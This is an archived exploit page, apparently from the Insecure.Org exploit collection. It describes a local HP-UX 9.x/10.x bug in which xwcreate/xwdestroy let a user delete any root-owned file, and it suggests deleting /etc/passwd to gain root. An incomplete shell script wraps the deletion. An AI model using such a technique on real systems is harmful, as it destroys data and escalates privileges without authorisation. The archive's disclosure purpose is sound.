|Description:||xwcreate and xwdestroy let you delete any file on system! |
|Author:||Colonel Panic of SOD (firstname.lastname@example.org) |
|Compromise:||delete any file on system, this can lead to root if you take out /etc/passwd, but BE CAREFUL! (local) |
|Vulnerable Systems:||HP/UX with vulnerable xwcreate/xwdestroy 9.x and possibly 10.x |
|Notes:||See the SOD HP Bug of the Week page |
# say Bye-Bye to any root owned file thanks to xwcreate/destroy
if [ -z "$1" ]
echo "try: `basename $0` filename [display]"
echo "WARNING: FILENAME PROBABLY WON'T BE THERE AFTER YOU DO THIS!"
echo "Display is optional, but you do need an xhost/authed display for this."
if [ -n "$2" ]
echo "Before: ls -l $1 produces:"
ls -l $1
echo "After: ls -l $1 produces:"
ls -l $1
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:
[ Nmap |
Sec Tools |
Mailing Lists |
Site News |